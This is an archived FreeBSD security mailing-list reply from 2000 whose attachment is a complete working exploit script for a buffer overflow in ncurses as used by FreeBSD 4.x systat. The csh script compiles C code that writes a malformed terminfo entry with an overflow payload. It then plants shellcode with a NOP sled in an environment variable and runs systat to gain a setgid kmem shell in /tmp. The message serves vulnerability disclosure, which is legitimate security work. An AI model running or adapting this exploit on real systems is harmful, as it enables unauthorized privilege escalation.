Date: Tue, 10 Oct 2000 16:07:37 +0200 From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl> To: freebsd-security@freebsd.org Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010160736.N94343@riget.scene.pl> In-Reply-To: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Tue, Oct 10, 2000 at 07:02:30AM -0700 References: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>
next in thread | previous in thread | raw e-mail | index | archive | help
--x+6KMIRAuhnl3hBn Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote: > For those of you who don't subscribe to BUGTRAQ, here's a heads up. And the exploit (in attachment). -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * --x+6KMIRAuhnl3hBn Content-Type: application/x-sh Content-Disposition: attachment; filename="systat.sh" Content-Transfer-Encoding: quoted-printable #!/bin/csh=0A=0A###########################################################= ###################=0A# (c) 2000 Przemys=B3aw Frasunek <venglin@freebsd.lub= lin.pl> #=0A# = #=0A# FreeBSD 4.x systat gid=3Dkmem exploit= #=0A# Idea by: Jouko Pynn=F6nen <jo= uko@SOLUTIONS.FI> #=0A# = #=0A# Dedicated to ks= m. #=0A# = #=0A# Nud= zi=B3o mi si=EA w szkole, tote=BF napisa=B3em sploita na angielskim. :) = #=0A##################################################################= ############=0A=0Acat << __EOF__ > /tmp/xx=0A#!/bin/csh=0A=0Acp /bin/csh /t= mp=0A/usr/sbin/chgrp kmem /tmp/csh=0Achmod 2755 /tmp/csh=0A__EOF__=0A=0Achm= od 755 /tmp/xx=0A=0Acat << __EOF__ > /tmp/sploitte.c=0A#include <stdio.h>= =0A#include <string.h>=0A#include <fcntl.h>=0A=0A#define OFF -400=0A#define= ALIGN 516=0A=0Along getesp(void)=0A{=0A __asm__("movl %esp, %eax\n");=0A}= =0A=0Aint main(void)=0A{=0A /* precompiled malformed terinfo binary */=0A= =0A char evilcap[] =3D=0A "\x1a\x01\x2a\x00\x26\x00\x21\x00\x82\x01\x09\x02= \x73\x63\x72\x65"=0A "\x65\x6e\x7c\x56\x54\x20\x31\x30\x30\x2f\x41\x4e\x53\= x49\x20\x58"=0A "\x33\x2e\x36\x34\x20\x76\x69\x72\x74\x75\x61\x6c\x20\x74\x= 65\x72"=0A "\x6d\x69\x6e\x61\x6c";=0A=0A char retbuf[5];=0A long ret =3D ge= tesp() + OFF;=0A int i;=0A=0A write(2, evilcap, sizeof(evilcap)-1);=0A for = (i=3D0;i<39;i++) write(2, "\0", 1);=0A for (i=3D0;i<86;i++) write(2, "\xff"= , 1);=0A write(2, "\0\0", 2);=0A for (i=3D0;i<750;i++) write(2, "\xff", 1);= =0A for (i=3D0;i<ALIGN;i++) write(2, "a", 1);=0A sprintf(retbuf, "%c%c%c%c"= , ((int)ret & 0xff),=0A (((int)ret & 0xff00) >> 8),=0A (((int)ret & 0xff0= 000) >> 16),=0A (((int)ret & 0xff000000) >> 24));=0A write(2, retbuf, 5);= =0A}=0A__EOF__=0A=0Acc -o /tmp/s /tmp/sploitte.c=0Acd $HOME=0Amkdir -p .ter= minfo/s=0Asetenv TERM screen=0A/tmp/s >& .terminfo/s/screen=0Asetenv EGG `p= erl -e 'print "\x90" x 10000 ; print "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\= xd2\x89\x56\x07\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e= \x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01= \x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"'`=0A/usr/= bin/systat >& /dev/null=0Arm -f .terminfo/s/screen=0Als -la /tmp/csh=0Arm -= f /tmp/xx /tmp/s /tmp/sploitte.c=0A --x+6KMIRAuhnl3hBn-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20001010160736.N94343>